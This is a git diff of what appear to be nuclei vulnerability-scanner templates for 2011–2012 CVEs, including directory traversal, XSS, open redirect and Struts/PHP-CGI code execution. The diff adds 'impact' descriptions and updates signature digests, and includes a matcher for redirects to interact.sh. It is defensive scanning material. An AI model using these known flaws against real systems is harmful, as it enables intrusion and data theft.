vulnerability than CVE-2011-2744. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ccaa1ad7fac3e62c06cb569dcf091a56ce50c9158117a5d34de10aa5b822e43d02203a5170833a6d68bb5bade8169b4478251afb3f5d17df27248bc92955766f92ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071fd623131d7bc529448e9ee46830beafa89d7ecccaad9846b2acccf9d44bfc1022100ef9a8e16568a6124b47717f337eb7629405220ee1508d3f0e0a4caf535ac2233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index f74f8b5278..26d4d11230 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + impact: | + An attacker can exploit this vulnerability to access sensitive files and directories on the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36256 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201eb76aac1d05a02462dcbb4a0f570215da52235e4c2560555d7a7658d117cdca02204830579f89076aa827ef53abfb58ccea4f45383f3942f3b1c1ab7d145e1c60dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b7392964ef378762e6b1bce5a5b25eb2084c11984e0c3ec13108d09f465682d02204ed59732b3f70aa5bfdb73ce1a8d1cc11c64e1393bcd0095f5bfdb14d7d1fb23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index b4abf4d032..c74b6299d4 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 @@ -43,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022053451e5690eb2f84dee04aa35a1c0954bd34bb6672d046237a4c07b1891df34c022046768382d17a3bae86fc3b88ec236ceec03a179318a2d79ad105ec3c947f9626:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ead2f7a38136dd68994c79dbeb18cf01fd4d516595fc88f5973525e340511446022100d80027066d11610588ffd72fd24fcdd4c226839cca15cdc0b265a9b54bf7cb87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 6b96964292..6b03042dfc 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 @@ -44,4 +46,4 @@ http: - 'contains(body_2, "")' - 'contains(body_1, "Advanced Text Widget")' condition: and -# digest: 4a0a00473045022100bab41b4e3cbdf9f91ef217eed2c475f2e55bbcc488d475bcd8554ffb5bfc2ed6022016a097a413083898aba272f37d3a0b34b295b6eb6c72bb77b3267b8d9e0a8d64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a77864d6263a6c9397ee40b285ee2af4533ac19ea960e55397ed2caa5316154022100bf56f186c8aa43739fdb6501b7b59969e146f9d69ecb772b6097d7b1fd87cb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index ecd32ada0a..fa6ae0c2ba 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009116632ffa126cd449fdc97ccbabe60966eeb951c1d0849d1d30e763e25fe56c022100b3e01c5535243fc7451c77cad005004d9ecd3a971cce97806ac805be23d0277e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e48c760facc10875f3b22aa4b2e7261cb9d94dbddc3bb83656766cfd3ae573d2022100cc1e13347644fd3ab565397b42e4b833231009c21c579f4ad5b936e3f8fa3f53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 8cab1a7768..c9a04bd4f9 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary local files, leading to unauthorized access to sensitive information or remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36598 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203affeb8d99a811e151da8924f8d7a577009eb90054ca14eb056b7d633a15cb2f022100eff7fa8466dfc8e5c1c7aa6c0f4521116f0c397b159fe24011c59b242ee27613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a828722c2b46d5775d2ec9bd905f56af4509edb26806bea57f8a6dc77bfebb50221009a2cfeda87892055cac84f182ea05c4f0f1e41e4835ab51b04bcb0281b4f7838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 6d1d3e9c65..81fc43e5a7 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d56555e027f495343e0cc20949b907ac985a6b461074dd004330a02566ad1327022066a6a5d0d9314a5d36ea612835db8cef708fae9f287996ac86aaa1ff808e9f9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e014fc72bf46cbcd1b06d11a0170ba550ca4984bf04f0d8c369f1cc4e4c1033022100fbf7e61f5dd4d08b3959553ada280e1d27b94faa5610e688201180230e2236e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 02263abac8..60ef2a505c 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042e55b9c813c44071ed574f3655a5ef53a8363ef952c58d1518b389e42f74f27022057f7ea384da619a03f3bf2a98b1d58eb8a89e84dc46a328b330810ddac4c8976:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038c3fec75cb4b8bf587e6df77c5d753c982049ad15b8672bfcddac5612c9e97a022054d03eb720bbbbc7d5ab05c19117b0ffcd706c84d4c37d51eb5c1aa0d899621b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index bdb61f296a..2a642d067e 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022055ced5bfd33e4afd72d67425819811a91e7e5f0876ce4e9885001d0c271de8af02201e4080fdcb830bf7270ef17418962c4874d2759c2f679dc72dbba486711b04fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a877db4fb15ee1e82c7f37a95b434e0cc663caa5035ff5f2064dc717b056b7c022023f26db461db668dd7d9b185eb2803f6056bc3bd0ffd47204c8b102f592a2d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 7b3ce1164c..062b625e3b 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aa234e86256ffc164333438fb7936a708815e293e76c9b28bd628c3e6224f65702203ff2f0e1d9b73ae425aac3c41cab67f26856c51d2f0d09f87468114a57ba76be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029dc11cace1e2333cfd9688a0051a1d57addb9ff4bd78726fa9e9e0f33c66c7e022073cf2693084088fff3a4a54c921729c04768bfb3e1be915ab2744bd639beb38b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 8d054c1eae..1c32f3d60a 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202af7bcc9621069d6db720d21c7742057c20f4657f0645be03ab678f2a104698c022079c834040fc7771880fe6161f0cc2c19d96dabd477c8d9ee292ef8f8c28c515e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba506809b9ad5aab64016ffb9e331ef401083b09c3d3c9519f7e84d44413a6ef02210086a8844b3cbf42d134258706821a568927e093ad19a1c03fc0c27166b1509468:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 723a5581e0..a47e02162c 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + impact: | + An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks. remediation: | Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities. reference: @@ -38,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100fd12e5a041aaae0a5130071fb6d9759118673193efd04dac265705836bcd458f0220112551af8b1e76af993ae7132cfd3191a310dd9bafb82ec45ef30cdbc813f68f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008422f3fc7d6aacfd8515a15ffef9144684a05df3de2d614412f0b4fc30e99d3c022100c0d5eccddc0e5a69cbb4ae993e1400aa262559e3dcf2d5c085df453d9880ca0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 2e0bc4ce9c..348c2ec18e 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d310e6f52ce09f6cb66affe4c4277d3982ca0d24328f3714f57205df09c46885022100fbe9afa165399a09ef0b094f39e70ae664f3b368e35074460bb496d0b0b4b383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206313bad87098f5965683f63da99d47a842af82dd612850eadc3943e6f1c4cd81022100ee53974c59c4a9d29ac7a810149c5e7ce9535b5bb808170cce6b91bc8150eb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index c6f7ba2976..cbcaad14ed 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution on the affected server. remediation: Developers should immediately upgrade to at least Struts 2.3.18. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b1137eae8a344fa580bcdf0fd96d13817bfebb8a4af031afca3a1b562eefa577022068aa9fd24ac7956a98b731113729ef99c2e79b3e4e2942629722e45f6ee107c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006282df56f2a901eecf94e9855d6db9df4946ed40b339abd3f6336b50969c41b02203b8999bd479093b096799e26a94f92a95d86ccd2f1eb2565bab5b8876cbe7e5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index ba2887e0a0..990069c471 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. remediation: | Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220214affb609f88f3bcefa9e96f9445a0c0b7dc150fc39e73903804932f73180840220614d57522a07fe917ca8530112b6cce116ea46fff598b28015ad0a9e71dbc88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009683d0193918ff118b880d91083267c382f2691a3c9a956f08d27934ed4d25d5022025d99bbc4674f817bab05edcf843bc7763be217cb1c647100ee8207338e9055a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 64df9a572b..7e797d39ce 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system. remediation: | Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability. reference: @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022043270f6e9f2f9572e9191960de0be3a7fe5f4760eb1412907dc92dc5b792bb78022100c182afeef7ff9e408fa61647426441dee6e4ec42c69e1967b3e88e8e2de27746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202937c32be7ffb92c9a11e845916e4b40d7f62f0a6ebcef1fb4707157f2b6f3040221008c5d345fb60fb88321f3a4f22b952d0e6f3396362ed4e66a5feff7a9bf57dcb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index f6eb6cc86a..45f5774a28 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bf62b8ae0e9423b477c4176ec968c8fba0b4b524efcf38632b247311beab69d9022100c4bc8fdbb209d38145f17f2439446cef82d76e8e2e66739c224ce851d6873049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058105695f45aca7080f4d99b0b495691bedb9798487eb893b5fa06a342008b53022100974de668cb5c4db918db8736a206169c76a05004a331d51435ebfd1bed2e3e89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 3ec8e4ecb2..cb6a21c41a 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096935d615f52f39f003fd899f9cb1d7be9b48c9c882ff733f686d82ba34ddae7022100f939341b22db34d1feb5098038d1eb5b1cef6b52ee242b97077c38b00e179dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091503c32f6e760d5c3d3aa871a287093fcf5f148c0541566fca436a744cb258f0221009e995a8a3d34953722e404cec14297887b6609f433012e27c2371ecbdf2cf5e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index a1b15ee904..fe71b944ea 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: low description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or upgrade to a newer version of OpenEMR. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100da8448c9e26c17591bc554c10c81dda090ebf4c1a8d21c302f6d0879191390a20221009bf19c03b16e307a1de9fae3124ef6c59c32878d5acc8a289ca625251e5a1ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206af9d5437a082136493eb50bae5a2cca921987ff736bc0aa1511fae3d10b352b02205c58f3fb4179c7c0cde24051152d8f79edb60483338dead09ad495395d428d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index dec76c85fe..c5e17f2295 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36784 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f84dea5c9153264884fa26ce4059f842dd09fb352df513c493deab6e3ffc82c20221008039d570b0e4e7cb119aa41bdd2d25704873ea821204e87ea27d953c8f8e1243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031d3f94d24b3d0f70fdbac9bb5aa6ce3d64935726c0b22eb244045ee63bcd7ab022100a675ebeee4e80933737faac919151326ffe3bc30491219101218ee770e14ccaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 41a91b7180..32bbc82087 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36873 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100922235435130580e69d43a791b7a6aea5dd2b8b9dd9178547dfd2ca308a43edf02202c57df51fc3da583fd8766dae576310d3fcdc98ca1d64d89ae0fb14cae6531c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d903161db4a66f050d495aa8c3e984263f7ff37e884924f6bb8d94a3060748bd02206cfb74efe3b2162cf198831ba090fa1c4cdacec5beb5689f8166486e88c25c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index df93200484..03f626eedf 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -6,6 +6,8 @@ info: severity: high description: | sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + impact: | + Remote code execution remediation: | Upgrade to a patched version of PHP or apply the necessary security patches. reference: @@ -47,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008066cdce18720214ac09d4d19671ec94b8843659b9ec85c84d36a7822f435e5502201ca5e1be58c49a2aff615040432936da67bb8453a9fe4bfe4a91c041fe0bef44:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fa871bad697cfafab48725ec3acf1f122ff655983323458968c2fa6f74207a07022100dcd66b02aefd91501668a7752f8a4c4a77d32a10bbfe55efe4994d8d7fdc6088:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 5054be3846..b3e0bda55b 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability. reference: @@ -51,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205dd5a5bd2f0159b576e307d90b86b925ec45251b2212bb03655460e26db678e002201274d73ccf5e3fedd3d5f955fda1f90dc3f48bcfcd807208ecd51830ee65298d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a60088dcada482af5029530d3b3d0e51b9af45aa4c0c305a241c89948cd3cc97022100f9cf4f0ca410a0b4479522c797020de7682ea6e26acbf65f9bdae70361ce1f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 5ae9918e62..a6268c69f2 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of 